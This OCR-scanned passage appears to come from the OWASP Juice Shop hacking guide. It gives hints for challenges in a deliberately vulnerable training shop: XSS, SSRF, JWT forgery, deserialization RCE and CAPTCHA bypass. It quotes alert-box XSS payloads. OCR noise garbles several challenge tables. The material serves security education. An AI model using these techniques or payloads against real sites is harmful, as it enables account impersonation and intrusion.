and some free text comment. When logged in, the feedback will be associated 
with the current user. When not logged in, the feedback will be posted 
anonymously. This challenge is about vilifying another user by posting a (most 
likely negative) feedback in his or her name! 


e This challenge can be solved via the user interface or by intercepting the 
communication with the RESTful backend. 

e To find the client-side leverage point, closely analyze the HTML form used for 
feedback submission. 
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e The backend-side leverage point is similar to some of the XSS challenges 
found in OWASP Juice Shop. 


Post a product review as another user or edit any 
user's existing review 


The Juice Shop allows users to provide reviews of all the products. A user has to 
be logged in before they can post any review for any of the products. This 
challenge is about vilifying another user by posting a (most likely bad) review in 
his or her name! 


e This challenge can be solved by using developers tool of your browser or 
with tools like postman. 

e Analyze the form used for review submission and try to find a leverage point. 

e This challenge is pretty similar to Post some feedback in another users name 
challenge. 


Put an additional product into another user's 
shopping basket 


View another user's shopping basket was only about spying out other customers. 
For this challenge you need to get your hands dirty by putting a product into 
someone else's basket that cannot be already in there! 


e Check the HTTP traffic while placing products into your own shopping basket 
to find a leverage point. 

e Adding more instances of the same product to someone else's basket does 
not qualify as a solution. The same goes for stealing from someone else's 
basket. 

e This challenge requires a bit more sophisticated tampering than others of the 
same ilk. 


Change the href of the link within the O-Saft product 
description 


The OWASP SSL Advanced Forensic Tool (O-Saft) product has a link in its 
description that leads to that projects wiki page. In this challenge you are 
supposed to change that link so that it will send you to http://kimminich.de instead. 
It is important to exactly follow the challenge instruction to make it light up green 
on the score board: 


e Original link tag in the description: <a href="https://www.owasp.org/index.php/0- 
Saft" target="_blank">More...</a> 
e Expected link tag in the description: <a href="http://kimminich.de" 


target="_blank">More...</a> 


e Theoretically there are three possible ways to beat this challenge: 
o Finding an administrative functionality in the web application that lets you 
change product data 


o Looking for possible holes in the RESTful API that would allow you to 
update a product 
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o Attempting an SQL Injection attack that sneaks in an uppate statement 
on product data 
e In practice two of these three ways should turn out to be dead ends 


Request a hidden resource on server through server 


This Server-side Request Forgery challenge will come back to the malware you 
used in Infect the server with juicy malware by abusing arbitrary command 


execution. 


e Using whatever you find inside the malware directly will not do you any good. 

e For this to count as an SSRF attack you need to make the Juice Shop server 
attack itself. 

e Do not try to find the source code for the malware on GitHub. Take it apart 
with classic reverse-engineering techniques instead. 


In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse 
functionality on the server to read or update internal resources. The 
attacker can supply or a modify a URL which the code running on the 
server will read or submit data to, and by carefully selecting the URLs, the 
attacker may be able to read server configuration such as AWS metadata, 
connect to internal services like http enabled databases or perform post 
requests towards internal services which are not intended to be exposed. 3 


View another user's shopping basket 


This horizontal privilege escalation challenge demands you to access the 
shopping basket of another user. Being able to do so would give an attacker the 
opportunity to spy on the victims shopping behaviour. He could also play a prank 
on the victim by manipulating the items or their quantity, hoping this will go 
unnoticed during checkout. This could lead to some arguments between the 
victim and the vendor. 


e Try out all existing functionality involving the shopping basket while having an 
eye on the HTTP traffic. 

e There might be a client-side association of user to basket that you can try to 
manipulate. 

e Incase you manage to update the database via SQL Injection so that a user 
is linked to another shopping basket, the application will not notice this 
challenge as solved. 


1, https://en.wikipedia.org/wiki/Privilege_escalation @ 


a https://en.wikipedia.org/wiki/Easter_egg_(media) e 


3, https://www.owasp.org/index.php/Server_Side_Request_Forgery @ 
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Security Misconfiguration 


Challenges covered in this chapter 


Name Description Difficulty 
Deprecated Use a deprecated B2B interface that was cae 
Interface not properly shut down. 

Error Provoke an error that is neither very y 

Handling gracefully nor consistently handled. 

Login Log in with the support team's original 

Support user credentials without applying SQL AKAAKA 
Team Injection or any other bypass. 


Use a deprecated B2B interface that was not properly 
shut down 


The Juice Shop represents a classic Business-to-Consumer (B2C) application, 
but it also has some enterprise customers for which it would be inconvenient to 
order large quantities of juice through the webshop UI. For those customers there 
is a dedicated B2B interface. 


e The old B2B interface was replaced with a more modern version recently. 

e When deprecating the old interface, not all of its parts were cleanly removed 
from the code base. 

e Simply using the deprecated interface suffices to solve this challenge. No 
attack or exploit is necessary. 


Provoke an error that is neither very gracefully nor 
consistently handled 


The OWASP Juice Shop is quite forgiving when it comes to bad input, broken 
requests or other failure situations. It is just not very sophisticated at handling 
errors properly. You can harvest a lot of interesting information from error 
messages that contain too much information. Sometimes you will even see error 
messages that should not be visible at all. 


Applications can unintentionally leak information about their configuration, 
internal workings, or violate privacy through a variety of application 
problems. Applications can also leak internal state via how long they take to 
process certain operations or via different responses to differing inputs, 
such as displaying the same error text with different error numbers. Web 
applications will often leak information about their internal state through 
detailed or debug error messages. Often, this information can be leveraged 


to launch or even automate more powerful attacks. ! 


e This challenge actually triggers from various possible error conditions. 
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e You can try to submit bad input to forms to provoke an improper error 
handling 

e Tampering with URL paths or parameters might also trigger an unforeseen 
error 


If you see the success notification for this challenge but no error message on 
screen, the error was probably logged on the JavaScript console of the browser. 
You were supposed to have it open all the time anyway, remember? 


Log in with the support team's original user 
credentials 


This is another follow-the-breadcrumbs challenge of the tougher sort. As a little 
background story, imagine that the OWASP Juice Shop was developed in the 
classic style: The development team wrote the code and then threw it over the 
fence to an operations and support team to run and troubleshoot the application. 
Not the slightest sign of DevOps culture here. 


e The support team is located in some low-cost country and the team structure 
fluctuates a lot due to people leaving for jobs with even just slightly better 
wages. 

e To prevent abuse the password for the support team account is very strong. 

e To allow easy access during an incident, the support team utilizes a 3rd party 
tool which every support engineer can access to get the current account 
password from. 

e While it is also possible to use SQL Injection to log in as the support team, 
this will not solve the challenge. 


1, https://www.owasp.org/index.php/Top_10_2007-Information_Leakage e 
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Cross Site Scripting (XSS) 


Cross-Site Scripting (XSS) attacks are a type of injection, in which 
malicious scripts are injected into otherwise benign and trusted web sites. 
XSS attacks occur when an attacker uses a web application to send 
malicious code, generally in the form of a browser side script, to a different 
end user. Flaws that allow these attacks to succeed are quite widespread 
and occur anywhere a web application uses input from a user within the 
output it generates without validating or encoding it. 


An attacker can use XSS to send a malicious script to an unsuspecting 
user. The end user’s browser has no way to know that the script should not 
be trusted, and will execute the script. Because it thinks the script came 
from a trusted source, the malicious script can access any cookies, session 
tokens, or other sensitive information retained by the browser and used 
with that site. These scripts can even rewrite the content of the HTML 
page. 


Challenges covered in this chapter 


Name Description Difficulty 

APl-onl Perform a persisted XSS attack with <iframe 

XSS y src="javascript:alert( xss`)"> without using trois 
the frontend application at all. 

Classic Perform an XSS attack with 

Stored <script>alert(*xss>)</script> ona legacy tok 

XSS page within the application. 

Client- Perform a persisted XSS attack with <iframe 

side XSS src="javascript:alert(*xss-)"> bypassing a trois 

Protection client-side security mechanism. 

DOM Perform a DOM XSS attack with <iframe ce 

XSS src="javascript:alert(`xss`)">. 

HTTP- Perform a persisted XSS attack with <iframe 

Header src="javascript:alert(`xss`)"> through an XAK K 

XSS HTTP header. 

Reflected Perform a reflected XSS attack with <iframe Ee 

XSS src="javascript:alert(`xss`)">. 

Server- Perform a persisted XSS attack with <iframe 

side XSS src="javascript:alert(`xss`)"> bypassing a kkk 

Protection server-side security mechanism. 

Video Embed an XSS payload </script> 

XSS <script>alert(`xss`)</script> into our promo KARAKK 


video. 


Perform a persisted XSS attack without using the 
frontend application at all 
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As presented in the Architecture Overview, the OWASP Juice Shop uses a 
JavaScript client on top of a RESTful API on the server side. Even without giving 
this fact away in the introduction chapter, you would have quickly figured this out 
looking at their interaction happening on the network. Most actions on the UI 
result in XMLHttpRequest ( xHR ) Objects being sent and responded to by the server. 


Carrot Juice (1000ml) 


rais Beschreibung 


AAs the old German saying goes: 
"Carrots are good for the eyes. Or 
has anyone ever seen a rabbit with 
glasses?” 


Rezensionen 





For the XSS Tier 3 challenge it is necessary to work with the server-side API 
directly. You will need a command line tool like curı or a tool for HTTP request 
tampering to master this challenge. 


e A matrix of known data entities and their supported HTTP verbs through the 
API can help you here 

e Careless developers might have exposed API methods that the client does 
not even need 


Perform an XSS attack on a legacy page within the 
application 


In the Architecture overview you were told that the Juice Shop uses a modern 
Single Page Application frontend. That was not entirely true. 


e Find a screen in the application that looks subtly odd and dated compared 
with all other screens 

e What is even better than homegrown validation based on a RegEx? 
Homegrown sanitization based on a RegEx! 


Perform a persisted XSS attack bypassing a client- 
side security mechanism 


This challenge is founded on a very common security flaw of web applications, 
where the developers ignored the following golden rule of input validation: 


Be aware that any JavaScript input validation performed on the client can 

be bypassed by an attacker that disables JavaScript or uses a Web Proxy. 
Ensure that any input validation performed on the client is also performed 

on the server.4 


e There are only some input fields in the Juice Shop forms that validate their 
input. 

e Even less of these fields are persisted in a way where their content is shown 
on another screen. 
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e Bypassing client-side security can typically be done by 
o either disabling it on the client (i.e. in the browser by manipulating the 
DOM tree) 
o or by ignoring it completely and interacting with the backend instead. 


Perform a DOM XSS attack 


DOM-based Cross-Site Scripting is the de-facto name for XSS bugs which 
are the result of active browser-side content on a page, typically JavaScript, 
obtaining user input and then doing something unsafe with it which leads to 
execution of injected code. 


The DOM, or Document Object Model, is the structural format used to 
represent documents in a browser. The DOM enables dynamic scripts such 
as JavaScript to reference components of the document such as a form 
field or a session cookie. The DOM is also used by the browser for security 
- for example to limit scripts on different domains from obtaining session 
cookies for other domains. A DOM-based XSS vulnerability may occur 
when active content, such as a JavaScript function, is modified by a 
specially crafted request such that a DOM element that can be controlled 
by an attacker.? 


e This challenge is almost indistinguishable from Perform a reflected XSS 
attack if you do not look "under the hood" to find out what the application 
actually does with the user input 


Perform a persisted XSS attack through an HTTP 
header 


This XSS challenge originates from an unsafely processed user input via an 
HTTP header. The difficulty lies in finding the attack path whereas the actual 
exploit is rather business as usual. 


e Finding a piece of information displayed in the UI that could originate from an 
HTTP header 

e You might have to look into less common or even proprietary HTTP headers 
to find the leverage point 

e Adding insult to injury, the HTTP header you need will never be sent by the 
application on its own 


Perform a reflected XSS attack 


Reflected Cross-site Scripting (XSS) occur when an attacker injects 
browser executable code within a single HTTP response. The injected 
attack is not stored within the application itself; it is non-persistent and only 
impacts users who open a maliciously crafted link or third-party web page. 
The attack string is included as part of the crafted URI or HTTP 
parameters, improperly processed by the application, and returned to the 


victim. 
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e Look for an input field where its content appears in the response when its 
form is submitted. 

e Try probing for XSS vulnerabilities by submitting text wrapped in an HTML 
tag which is easy to spot on screen, e.g. <hi> OF <strike> . 


Perform a persisted XSS attack bypassing a server- 
side security mechanism 


This is one of the hardest XSS challenges, as it cannot be solved by just fiddling 
with the client-side JavaScript or bypassing the client entirely. Whenever there is 
a server-side validation or input processing involved, you should investigate how it 
works. Finding out implementation details e.g. used libraries, modules or 
algorithms - should be your priority. If the application does not leak this kind of 
details, you can still go for a blind approach by testing lots and lots of different 
attack payloads and check the reaction of the application. 


When you actually understand a security mechanism you have a lot higher 
chance to beat or trick it somehow, than by using a trial and error approach. 


e The Comment field in the Contact Us screen is where you want to put your 
focus on 
e The attack payload <iframe src="javascript:alert(~xss’)"> will not be rejected 
by any validator but stripped from the comment before persisting it 
e Look for possible dependencies related to input processing in the 
package.json.bak you harvested earlier 
e lfan xss alert shows up but the challenge does not appear as solved on the 
Score Board, you might not have managed to put the exact attack string 
<iframe src="javascript:alert(*xss° )"> into the database? 


Embed an XSS payload into our promo video 


As with the previous one, the difficulty of this challenge is based on how hard it is 
to successfully place the XSS payload in the application. 


e Without utilizing the vulnerability behind another *+% xx xxx challenge it is 
not possible to plant the XSS payload for this challenge 
e The mentioned "marketing collateral" might have been publicly advertised by 
the Juice Shop but is not necessarily part of its sitemap yet 
e This challenge will always partially keep you blindfolded, no matter how hard 
you do research and analysis. 
1, https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) e 
2 
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripti 
ng_(OWASP-DV-001) © 
3 https://www.owasp.org/index.php/Testing_for_DOM- 
based_Cross_site_scripting_(OTG-CLIENT-001) e 
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4 


https:/Awww.owasp.org/index.php/Input_Validation_Cheat_Sheet#Client_Si 
de_vs_Server_Side_Validation e 
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Insecure Deserialization 


Serialization is the process of turning some object into a data format that 
can be restored later. People often serialize objects in order to save them to 
storage, or to send as part of communications. Deserialization is the 
reverse of that process -- taking data structured from some format, and 
rebuilding it into an object. Today, the most popular data format for 
serializing data is JSON. Before that, it was XML. 


However, many programming languages offer a native capability for 
serializing objects. These native formats usually offer more features than 
JSON or XML, including customizability of the serialization process. 
Unfortunately, the features of these native deserialization mechanisms can 
be repurposed for malicious effect when operating on untrusted data. 
Attacks against deserializers have been found to allow denial-of-service, 
access control, and remote code execution attacks. | 


Challenges covered in this chapter 


Name Description Difficulty 
Blocked Perform a Remote Code Execution that 

would keep a less hardened application AAAA 
RCE DoS 

busy forever. 
Successi Perform a Remote Code Execution that 
RCE DoS occupies the server for a while without AAAA AA 


using infinite loops. 


© Please note that both RCE challenges described below are not available when 
running the Juice Shop in either a Docker container or on a Heroku dyno! The 
deserialization actually happens in a sandbox with a timeout, but with sufficient 
skills an attacker could break out of the sandbox and actually harm the underlying 
system. While it is unfortunate to not have RCE challenges on containerized 
environments, this illustrates how hard it is to protect against deserialization 
attacks except for not using it at all. 


Perform a Remote Code Execution that would keep a 
less hardened application busy forever 
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Code Injection is the general term for attack types which consist of injecting 
code that is then interpreted/executed by the application. This type of attack 
exploits poor handling of untrusted data. These types of attacks are usually 
made possible due to a lack of proper input/output data validation, for 
example: 


e allowed characters (standard regular expressions classes or custom) 
e data format 
e amount of expected data 


Code Injection differs from Command Injection in that an attacker is only 
limited by the functionality of the injected language itself. If an attacker is 
able to inject PHP code into an application and have it executed, he is only 
limited by what PHP is capable of. Command injection consists of 
leveraging existing code to execute commands, usually within the context 
ofa shell.2 


The ability to trigger arbitrary code execution from one machine on another 
(especially via a wide-area network such as the Internet) is often referred to 


as remote code execution. 


e The feature you need to exploit for this challenge is not directly advertised 
anywhere. 

e As the Juice Shop is written in pure Javascript, there is one data format that 
is most probably used for serialization. 

e You should try to make the server busy for all eternity. 

e The challenge will be solved if you manage to trigger the protection of the 
application against a very specific DoS attack vector. 

e Similar to the Let the server sleep for some time challenge (which accepted 
nothing but NoSQL Injection as a solution) this challenge will only accept 
proper RCE as a solution. It cannot be solved by simply hammering the 
server with requests. That would probably just kill your server instance. 


Perform a Remote Code Execution that occupies the 
server for a while without using infinite loops 


An infinite loop (or endless loop) is a sequence of instructions in a 
computer program which loops endlessly, either due to the loop having no 
terminating condition, having one that can never be met, or one that causes 
the loop to start over.4 


e This challenge uses the same leverage point as Perform a Remote Code 
Execution that would keep a less hardened application busy forever. 

e The application has a protection against too many iterations (i.e. infinite 
loops) which your attack must not trigger in order to solve this challenge. 


1 . https:/Awww.owasp.org/index.php/Deserialization_Cheat_Sheet +e 


2 https://www.owasp.org/index.php/Code_Injection © 


3 https://en.wikipedia.org/wiki/Arbitrary_code_execution © 


$ https://en.wikipedia.org/wiki/Infinite_loop © 
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Vulnerable Components 


The challenges in this chapter are all about security issues of libraries or other 3rd 
party components the application uses internally. 


Challenges covered in this chapter 


Name Description Difficulty 
Wee Filg Overwrite the Legal Information file. AAAA 
Forged Forge an almost properly RSA-signed 
org JWT token that impersonates the (non- AAAA 
Signed JWT S oe 
existing) user rsa_lord@juice-sh.op. 
Inform the shop about a typosquatting 
Frontend imposter that dug itself deep into the 
Typosquatting frontend. (Mention the exact name of KARI 
the culprit) 
Inform the shop about a typosquatting 
Legacy trick it has been a victim of at least in eee 
Typosquatting v6.2.@-SNAPSHOT . (Mention the exact 
name of the culprit) 
Inform the development team about a 
Supply Chain danger to some of their credentials. 
Attack (Send them the URL of the original Aok 
report or the CVE of this vulnerability) 
; Forge an essentially unsigned JWT 
Unsigned s 
JWT token that impersonates the (non- KAAKA 
existing) user jwin3d@juice-sh.op. 
Inform the shop about a vulnerable 
Vulnerable library it is using. (Mention the exact achat 
Library library name and version in your 


comment) 


Overwrite the Legal Information file 
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Uploaded files represent a significant risk to applications. The first step in 
many attacks is to get some code to the system to be attacked. Then the 
attack only needs to find a way to get the code executed. Using a file 
upload helps the attacker accomplish the first step. 


The consequences of unrestricted file upload can vary, including complete 
system takeover, an overloaded file system or database, forwarding attacks 
to back-end systems, client-side attacks, or simple defacement. It depends 
on what the application does with the uploaded file and especially where it 
is stored. 


There are really two classes of problems here. The first is with the file 
metadata, like the path and file name. These are generally provided by the 
transport, such as HTTP multi-part encoding. This data may trick the 
application into overwriting a critical file or storing the file in a bad location. 
You must validate the metadata extremely carefully before using it. 


The other class of problem is with the file size or content. The range of 
problems here depends entirely on what the file is used for. See the 
examples below for some ideas about how files might be misused. To 
protect against this type of attack, you should analyse everything your 
application does with files and think carefully about what processing and 
interpreters are involved. 


Find all places in the application where file uploads are possible. 

For at least one of these, the Juice Shop is depending on a library that 
suffers from an arbitrary file overwrite vulnerability. 

You can find a hint toward the underlying vulnerability in the 
@owasp_juiceshop Twitter timeline 


Forge an almost properly RSA-signed JWT token 


Like Forge an essentially unsigned JWT token this challenge requires you to 


make a valid JWT for a user that does not exist. What makes this challenge even 


harder is the requirement to have the JWT look like it was properly signed. 


The three generic hints from Forge an essentially unsigned JWT token also 
help with this challenge. 

Instead of enforcing no encryption to be applied, try to apply a more 
sophisticated exploit against the JWT libraries used in the Juice Shop. 
Getting your hands on the public RSA key the application employs for its 
JWTs is mandatory for this challenge. 

Finding the corresponding private key should actually be impossible, but that 
obviously doesn't make this challenge unsolvable. 

Make sure your JWT is URL safe! 


Inform the shop about a typosquatting imposter that 
dug itself deep into the frontend 
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Typosquatting, also called URL hijacking, a sting site, or a fake URL, isa 
form of cybersquatting, and possibly brandjacking which relies on mistakes 
such as typos made by Internet users when inputting a website address 
into a web browser. Should a user accidentally enter an incorrect website 
address, they may be led to any URL (including an alternative website 
owned by a cybersquatter). 


The typosquatter's URL will usually be one of four kinds, all similar to the 
victim site address (e.g. example.com): 


e Acommon misspelling, or foreign language spelling, of the intended 
site: exemple.com 

e A misspelling based on typos: examlpe.com 

e A differently phrased domain name: examples.com 

e A different top-level domain: example.org 

e An abuse of the Country Code Top-Level Domain (ccTLD): 
example.cm by using .cm, example.co by using .co, or example.om by 
using .om. Aperson leaving out a letter in .com in error could arrive at 
the fake URL's website. 


Once in the typosquatter's site, the user may also be tricked into thinking 
that they are in fact in the real site, through the use of copied or similar 
logos, website layouts or content. Spam emails sometimes make use of 
typosquatting URLs to trick users into visiting malicious sites that look like a 


given bank's site, for instance. 1 


This challenge is about identifying and reporting (via the 
http://localhost:3000/#/contact form) a case of typosquatting hidden in the Juice 
Shop. It is supposedly hard to locate. 


e This challenge has nothing to do with URLs or domains. 
e Other than for its legacy companion, combing through the package. json. bak 
does not help for this challenge. 


@ There is no actual malice or mischief included, as the typosquatter is 
completely harmless. Just keep in mind that in reality, a case like this could come 
with negative consequences and would sometimes be even harder to identify. 


Inform the shop about a typosquatting trick it has 
been a victim of 


This challenge is about identifying and reporting (via the 
http://localhost:3000/#/contact form) a case of typosquatting that successfully 
sneaked into an older version of the Juice Shop. Luckily, it is not in use any more 
in v9.1.0. 


e Just like its frontend companion this challenge also has nothing to do with 
URLs or domains. 

e Investigating the forgotten developer's backup file might bring some insight. 

e Malicious packages in npm is a worthwhile read on Ivan Akulov’s blog. 
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Inform the development team about a danger to some 
of their credentials 


A software supply chain attack is when an attacker gains access toa 
legitimate software vendor and then compromises either the software or 
update repository. This is done with the intention of installing a backdoor, or 
other malicious code, into the legitimate software update provided by the 
vendor. As users update their software, unwittingly falling victim to the 
Trojanized update, they also install the embedded malicious code. 


© Please note that having the OWASP Juice Shop installed on your computer 
does not put you at any actual risk! This challenge does neither install a backdoor 
or Trojan nor does it bring any other harmful code to your system! 


e The shop's end users are not the targets here. The developers of the shop 


are! 


e This is a research-heavy challenge which does not involve any actual 


hacking. 


e Solving Access a developer's forgotten backup file before attempting this 


challenge will save you from a lot of frustration. 


Forge an essentially unsigned JWT token 


JSON Web Token (JWT) is a compact, URL-safe means of representing 
claims to be transferred between two parties. The claims in a JWT are 
encoded as a JSON object that is used as the payload of a JSON Web 
Signature (JWS) structure or as the plaintext of a JSON Web Encryption 
(JWE) structure, enabling the claims to be digitally signed or integrity 
protected with a Message Authentication Code (MAC) and/or encrypted.” 


This challenge involves forging a valid JWT for a user that does not exist in the 
database but make the application believe it is still legit. 


You should begin with retrieving a valid JWT from the application's 
Authorization request header. 

A JWT is only given to users who have logged in. They have a limited validity, 
so better do not dawdle. 

Try to convince the site to give you a valid token with the required payload 

while downgrading to no encryption at all. 

Make sure your JWT is URL safe! 


Inform the shop about a vulnerable library it is using 


This challenge is quite similar to Inform the shop about an algorithm or library it 
should definitely not use the way it does with the difference, that here not the 


general use of the library is the issue. The application is just using a version of a 
library that contains known vulnerabilities. 


Use the Contact Us form to submit a feedback mentioning the vulnerable 
library including its exact version. 
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e Look for possible dependencies related to security in the package. json.bak 
you probably harvested earlier during the Access a developer's forgotten 
backup file challenge. 

e Do some research on the internet for known security issues in the most 
suspicious application dependencies. 


1, https://en.wikipedia.org/wiki/Typosquatting + 


2 https://tools.ietf.org/html/rfc7519 © 


3 https://www.owasp.org/index.php/Unrestricted_File_ Upload e 


E https://www.rsa.com/en-us/blog/2017-02/are-software-supply-chain- 


attacks-the-new-norm © 
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Security through Obscurity 


Many applications contain content which is not supposed to be publicly 
accessible. A properly implemented authorization model would ensure that only 
users with appropriate permission can access such content. If an application 
instead relies on the fact that the content is not visible anywhere, this is called 
"security through obscurity" which is a severe anti-pattern: 


In security engineering, security through obscurity (or security by obscurity) 
is the reliance on the secrecy of the design or implementation as the main 
method of providing security for a system or component of a system. A 
system or component relying on obscurity may have theoretical or actual 
security vulnerabilities, but its owners or designers believe that if the flaws 
are not known, that will be sufficient to prevent a successful attack. Security 
experts have rejected this view as far back as 1851, and advise that 
obscurity should never be the only security mechanism. | 


Challenges covered in this chapter 


Name Description Difficulty 
Blockchain Learn about the Token Sale before its 

Hype official announcement. Kak 
Privacy Policy Prove that you actually read our privacy en 
Inspection policy. 


Rat out a notorious character hiding in 


plain sight in the shop. KKK 


Steganography 


Learn about the Token Sale before its official 
announcement 


Juice Shop does not want to miss out on the chance to gain some easy extra 
funding, so it prepared to launch a "Token Sale" (synonymous for "Initial Coin 
Offering") to sell its newly invented cryptocurrency to its customers and future 
investors. This challenge is about finding the prepared-but-not-yet-published page 
about this ICO in the application. 
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An initial coin offering (ICO) is a controversial means of crowdfunding 
centered around cryptocurrency, which can be a source of capital for 
startup companies. In an ICO, a quantity of the crowdfunded 
cryptocurrency is preallocated to investors in the form of "tokens", in 
exchange for legal tender or other cryptocurrencies such as bitcoin or 
ethereum. These tokens supposedly become functional units of currency if 
or when the ICO's funding goal is met and the project launches. 


ICOs provide a means by which startups avoid costs of regulatory 
compliance and intermediaries, such as venture capitalists, bank and stock 
exchanges, while increasing risk for investors. |COs may fall outside 
existing regulations or may need to be regulated depending on the nature 
of the project, or are banned altogether in some jurisdictions, such as China 
and South Korea. 


[...] The term may be analogous with "token sale" or crowdsale, which 
refers to a method of selling participation in an economy, giving investors 
access to the features of a particular project starting at a later date. |COs 
may sell a right of ownership or royalties to a project, in contrast to an initial 
public offering which sells a share in the ownership of the company itself.2 


e Guessing or brute forcing the URL of the token sale page is very unlikely to 
succeed. 

e You should closely investigate the place where all paths within the application 
are defined. 

e Beating the employed obfuscation mechanism manually will take some time. 
Maybe there is an easier way to undo it? 


Prove that you actually read our privacy policy 


User agreements and privacy policies are too often simply dismissed or blindly 
accepted. This challenge kind of forces you to reconsider that approach. 


e First you should obviously solve Read our privacy policy. 

e Itis fine to use the mouse cursor to not lose sight of the paragraph you are 
currently reading. 

e If you find some particularly hot sections in the policy you might want to melt 
them together similar to what you might have already uncovered in Apply 
some advanced cryptanalysis to find the real easter egg. 


Rat out a notorious character hiding in plain sight in 
the shop 
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Steganography is the practice of concealing a file, message, image, or 
video within another file, message, image, or video. The word 
steganography combines the Greek words steganos (oTeyavdc), meaning 
"covered, concealed, or protected", and graphein (ypd@eiv) meaning 
"writing". 


The first recorded use of the term was in 1499 by Johannes Trithemius in 
his Steganographia, a treatise on cryptography and steganography, 
disguised as a book on magic. Generally, the hidden messages appear to 
be (or to be part of) something else: images, articles, shopping lists, or 
some other cover text. For example, the hidden message may be in 
invisible ink between the visible lines of a private letter. Some 
implementations of steganography that lack a shared secret are forms of 
security through obscurity, and key-dependent steganographic schemes 
adhere to Kerckhoffs's principle. 


The advantage of steganography over cryptography alone is that the 
intended secret message does not attract attention to itself as an object of 
scrutiny. Plainly visible encrypted messages, no matter how unbreakable 
they are, arouse interest and may in themselves be incriminating in 
countries in which encryption is illegal. 


Whereas cryptography is the practice of protecting the contents of a 
message alone, steganography is concerned with concealing the fact that a 
secret message is being sent as well as concealing the contents of the 
message. 


Steganography includes the concealment of information within computer 
files. In digital steganography, electronic communications may include 
steganographic coding inside of a transport layer, such as a document file, 
image file, program or protocol. Media files are ideal for steganographic 
transmission because of their large size. For example, a sender might start 
with an innocuous image file and adjust the color of every hundredth pixel 
to correspond to a letter in the alphabet. The change is so subtle that 
someone who is not specifically looking for it is unlikely to notice the 


change.? 


e There is not the slightest chance that you can spot the hidden character with 
the naked eye. 

e The effective difficulty of this challenge depends a lot on what tools you pick 
to tackle it. 

e This challenge cannot be solved by just reading our "Lorem |psum"-texts 
carefully. 


1, https://en.wikipedia.org/wiki/Security_through_obscurity @ 


2 https://en.wikipedia.org/wiki/Initial_coin_offering e 


3 https://en.wikipedia.org/wiki/Steganography e 


129 


Unvalidated Redirects 


Challenges covered in this chapter 


Name Description Difficulty 
Ouiteied | rene, adireaceswhlen erent Onni | 3 
Whitelist y P 

any longer. 
Whitelist Enforce a redirect to a page you are not E 
Bypass supposed to redirect to. 


Let us redirect you to one of our crypto currency 
addresses 


Some time ago the Juice Shop project accepted donations via Bitcoin, Dash and 
Ether. It never received any, so these were dropped at some point. 


e When removing references to those addresses from the code the developers 
have been a bit sloppy. 

e More particular, they have been sloppy in a way that even the Angular 
Compiler was not able to clean up after them automatically. 

e Itis of course not sufficient to just visit any of the crypto currency links directly 
to solve the challenge. 


Enforce a redirect to a page you are not supposed to 
redirect to 


This challenge is about redirecting to an entirely unallowed different location. 


e You can find several places where redirects happen in the OWASP Juice 
Shop 

e The application will only allow you to redirect to whitelisted URLs 

e Tampering with the redirect mechanism might give you some valuable 
information about how it works under to hood 


White list validation involves defining exactly what is authorized, and by 
definition, everything else is not authorized. 


1 


https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet#White_Lis 
t_Input_Validation @ 
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Broken Anti-Automation 


Web applications are subjected to unwanted automated usage — day in, 
day out. Often these events relate to misuse of inherent valid functionality, 
rather than the attempted exploitation of unmitigated vulnerabilities. Also, 
excessive misuse is commonly mistakenly reported as application denial- 
of-service (DoS) like HTTP-flooding, when in fact the DoS is a side-effect 
instead of the primary intent. Frequently these have sector-specific names. 
Most of these problems seen regularly by web application owners are not 
listed in any OWASP Top Ten or other top issue list. Furthermore, they are 
not enumerated or defined adequately in existing dictionaries. These 
factors have contributed to inadequate visibility, and an inconsistency in 
naming such threats, with a consequent lack of clarity in attempts to 


address the issues. 1 


Challenges covered in this chapter 


Name Description Difficulty 
CAPTCHA Submit 10 or more customer feedbacks sis 
Bypass within 10 seconds. 

Extra Retrieve the language file that never made 

Language it into production. Kit 
Multiple Like any review at least three times as the 

Likes same user. RAIA 
Reset Reset Morty's password via the Forgot 

Morty's Password mechanism with his obfuscated kikik 
Password answer to his security question. 


Submit 10 or more customer feedbacks within 10 
seconds 


The Contact Us form for customer feedback contains a CAPTCHA to protect it 
from being abused through scripting. This challenge is about beating this 
automation protection. 
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A completely automated public Turing test to tell computers and humans 
apart, or CAPTCHA, is a program that allows you to distinguish between 
humans and computers. First widely used by Alta Vista to prevent 
automated search submissions, CAPTCHAs are particularly effective in 
stopping any kind of automated abuse, including brute-force attacks. They 
work by presenting some test that is easy for humans to pass but difficult 
for computers to pass; therefore, they can conclude with some certainty 
whether there is a human on the other end. 


For a CAPTCHA to be effective, humans must be able to answer the test 
correctly as close to 100 percent of the time as possible. Computers must 
fail as close to 100 percent of the time as possible. 


e You could prepare 10 browser tabs, solving every CAPTCHA and filling out 
the each feedback form. Then you'd need to very quickly switch through the 
tabs and submit the forms in under 10 seconds total. 

e Should the Juice Shop ever decide to change the challenge into "Submit 100 
or more customer feedbacks within 60 seconds" or worse, you'd probably 
have a hard time keeping up with any tab-switching approach. 

e Investigate closely how the CAPTCHA mechanism works and try to find 
either a bypass or some automated way of solving it dynamically. 

e Wrap this into a script (in whatever programming language you prefer) that 
repeats this 10 times. 


Retrieve the language file that never made it into 
production 


A project is internationalized when all of the project’s materials and 
deliverables are consumable by an international audience. This can involve 
translation of materials into different languages, and the distribution of 
project deliverables into different countries.° 


Following this requirement OWASP sets for all its projects, the Juice Shop's user 
interface is available in different languages. One extra language is actually 
available that you will not find in the selection menu. 


WB OWASP Juice Shop @ oome medies momia += Suomalainen A Q Parts ORRA 


| Français 
Ba GMy@o 
a nwăä 


Apple Juice (1000ml) The all-time classic. A 
MEA Finest pressings of apples. Allergy disclaimer: Might contain traces of worms: 
Canbe for recycling. 


e First you should find out how the languages are technically changed in the 





user interface. 
e Guessing will most definitely not work in this challenge. 
e You should rather choose between the following two ways to beat this 
challenge: 
o Apply brute force (and don't give up to quickly) to find it. 
o Investigate online what languages are actually available. 
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A brute force attack can manifest itself in many different ways, but primarily 
consists in an attacker configuring predetermined values, making requests 
to a server using those values, and then analyzing the response. For the 
sake of efficiency, an attacker may use a dictionary attack (with or without 
mutations) or a traditional brute-force attack (with given classes of 
characters e.g.: alphanumerical, special, case (in)sensitive). Considering a 
given method, number of tries, efficiency of the system which conducts the 
attack, and estimated efficiency of the system which is attacked the 
attacker is able to calculate approximately how long it will take to submit all 
chosen predetermined values. 


Like any review at least three times as the same user 


Any online shop with a review or rating functionality for its products should be very 
keen on keeping fake or inappropriate reviews out. The Juice Shop decided to 
